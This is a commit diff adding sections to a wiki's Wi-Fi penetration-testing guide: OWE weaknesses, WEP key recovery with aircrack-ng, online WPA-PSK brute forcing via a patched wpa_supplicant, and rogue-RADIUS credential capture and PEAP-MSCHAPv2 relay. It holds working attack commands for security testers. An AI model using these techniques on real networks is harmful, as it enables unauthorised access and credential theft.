Merge pull request #1760 from HackTricks-wiki/update_Wireless-_in_Fidelity__Pentesting_Wi-Fi_in_2025_20260114_124845

carlospolop · web-flow · commit 14768330ac48 · 2026-01-23T09:12:53.000+01:00
Wireless-(in)Fidelity Pentesting Wi-Fi in 2025
diff --git a/src/generic-methodologies-and-resources/pentesting-wifi/README.md b/src/generic-methodologies-and-resources/pentesting-wifi/README.md
@@ -108,6 +108,26 @@ This tool automates **WPS/WEP/WPA-PSK** attacks. It will automatically:
   - **+ Open** -- Useful to capture captive portal creds and/or perform LAN attacks
   - **+ WPA** -- Useful to capture WPA handshakes
 
+## Open / OWE networks quick notes
+
+- **Passive capture** on open SSIDs still works with monitor mode and tcpdump:
+
+```bash
+iw wlan0 set type monitor
+ip link set wlan0 up
+iw wlan0 set channel 6
+tcpdump -i wlan0 -w capture.pcap
+```
+
+- **OWE** (Opportunistic Wireless Encryption) performs a per-station key exchange (no PSK), so air frames are encrypted even on "open" SSIDs. Being WPA3-based, it also enforces **802.11w PMF**, which blocks spoofed deauth/disassoc frames.
+- OWE **does not authenticate** joiners: anyone can associate, so **verify client isolation** instead of trusting marketing claims. Without isolation, ARP spoofing or responder-style poisoning on the local L2 still works.
+- **Evil Twin** remains feasible on open/OWE SSIDs by presenting a stronger signal; PMF just removes the deauth shortcut. If victims accept a forged TLS cert, full HTTP(S) MitM is regained.
+- Broadcast poisoning on open guest Wi-Fi easily yields creds/hashes (LLMNR/NBT-NS/mDNS). See:
+
+{{#ref}}
+../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
+{{#endref}}
+
 ## DOS
 
 ### Deauthentication Packets
@@ -283,7 +303,22 @@ All the proposed WPS attacks can be easily performed using _**airgeddon.**_
 
 ## **WEP**
 
-So broken and unused nowdays. Just know that _**airgeddon**_ have a WEP option called "All-in-One" to attack this kind of protection. More tools offer similar options.
+**Why it collapses**
+
+- RC4 seed is just **IV (24 bits) + shared key**. The IV is cleartext, tiny (2^24), and repeats quickly, so ciphertexts with the same IV reuse the keystream.
+- XORing two ciphertexts with the same keystream leaks `PlaintextA ⊕ PlaintextB`; predictable headers + RC4 KSA biases (**FMS**) let you “vote” key bytes. **PTW** optimises this using ARP traffic to drop requirements to tens of thousands of packets instead of millions.
+- Integrity is only **CRC32** (linear/unkeyed), so an attacker can flip bits and recompute CRC32 without the key → packet forgery/replay/ARP injection while waiting for IVs.
+
+Practical break is deterministic:
+
+```bash
+airodump-ng --bssid <BSSID> --channel <ch> --write wep_capture wlan1mon  # collect IVs
+# optionally speed up IVs without deauth by replaying ARP
+aireplay-ng --arpreplay -b <BSSID> -h <clientMAC> wlan1mon
+aircrack-ng wep_capture-01.cap  # PTW attack recovers key once IV threshold is met
+```
+
+Airgeddon still ships an "All-in-One" WEP workflow if you prefer a guided UI.
 
 ![](<../../images/image (432).png>)
 
@@ -402,6 +437,36 @@ apt-get install pyrit #Not working for newer versions of kali
 pyrit -r psk-01.cap analyze
 ```
 
+#### Faster online PSK guessing via `wpa_supplicant` ctrl socket (no clients/PMKID)
+
+When no clients are around and the AP refuses PMKID, you can iterate PSKs online without respawning supplicants:
+
+- Patch `wpa_supplicant.c` to force `dur = 0;` in the auth failure backoff logic (around `ssid->auth_failures`), effectively disabling the temporary-disable timer.
+- Run a single daemon with a control socket:
+
+```bash
+# wpa_supplicant.conf
+ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=root
+update_config=1
+
+wpa_supplicant -B -i wlp3s0 -c wpa_supplicant.conf
+```
+
+- Drive it via the control interface, reusing the same scan and network:
+
+```text
+ADD_NETWORK
+SET_NETWORK 0 ssid "<ssid>"
+ENABLE_NETWORK 0
+SCAN
+(loop)
+  SET_NETWORK 0 psk "<candidate>"
+  REASSOCIATE
+  wait for CTRL-EVENT-CONNECTED / DISCONNECTED
+```
+
+A small Python loop reading socket events (`CTRL-EVENT-CONNECTED` / `CTRL-EVENT-DISCONNECTED`) can test ~100 guesses in ~5 minutes without scan overhead. It is still noisy and detectable, but avoids per-attempt process restarts and backoff delays.
+
 ## **WPA Enterprise (MGT)**
 
 In **enterprise WiFi setups, you'll encounter various authentication methods**, each providing different security levels and management features. When you use tools like `airodump-ng` to inspect network traffic, you might notice identifiers for these authentication types. Some common methods include:
@@ -714,6 +779,16 @@ Or you could also use:
 - `--negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAP` to specify manually the methods offered (offering the same auth methods in the same order as the organisation the attack will be much more difficult to detect).
 - [Find more info in the wiki](http://solstice.sh/wireless/eaphammer/2019/09/10/eap-downgrade-attacks/)
 
+#### When clients skip RADIUS certificate validation (PEAP/TTLS)
+
+- If devices are configured with "do not validate certificate", a cloned AP + rogue RADIUS (`eaphammer --cert-wizard --creds --auth wpa-eap`) will collect **NetNTLMv2** (PEAP-MSCHAPv2) or **cleartext** creds (PEAP-GTC). `bettercap` deauth (`wifi.deauth <BSSID>`) both reveals hidden SSIDs during probes and forces reconnects, unless PMF/802.11w blocks spoofed deauth.
+- Cracked NetNTLMv2 gives reusable Wi‑Fi/AD creds; GTC yields immediate plaintext.
+
+#### Relaying PEAP-MSCHAPv2 instead of cracking (wpa_sycophant + hostapd-mana)
+
+- For machine accounts with uncrackable random passwords, abuse **MSCHAPv2 relay**: run `hostapd-mana` as the Evil Twin, forwarding the MSCHAPv2 exchange to `wpa_sycophant`, which simultaneously connects to the legitimate AP. Successful relay grants authenticated Wi‑Fi without recovering the password.
+- Use builds that support the target security level (WPA3/PMF requires recent hostapd/wpa_supplicant); PMF prevents deauth coercion, so wait for voluntary client associations.
+
 **Using Airgeddon**
 
 `Airgeddon` can use previously generated certificated to offer EAP authentication to WPA/WPA2-Enterprise networks. The fake network will downgrade the connection protocol to EAP-MD5 so it will be able to **capture the user and the MD5 of the password**. Later, the attacker can try to crack the password.\
@@ -851,6 +926,8 @@ These methods, particularly PIN entry, are susceptible to the same vulnerabiliti
 - [The vulnerability that killed FreeWifi_Secure](https://7h30th3r0n3.fr/the-vulnerability-that-killed-freewifi_secure/)
 - [RFC 4186 – EAP-SIM Authentication](https://datatracker.ietf.org/doc/html/rfc4186)
 - [3GPP TS 33.402 – 3GPP system architecture evolution (SAE); Security aspects of non-3GPP accesses](https://www.3gpp.org/ftp/Specs/archive/33_series/33.402/)
+- [Wireless-(in)Fidelity: Pentesting Wi-Fi in 2025 (Synacktiv)](https://www.synacktiv.com/en/publications/wireless-infidelity-pentesting-wi-fi-in-2025.html)
+- [PEAP relay attacks with wpa_sycophant (SensePost)](https://sensepost.com/blog/2019/peap-relay-attacks-with-wpa_sycophant/)
 
 
 TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) (login con facebook e imitacionde WPA en captive portals)
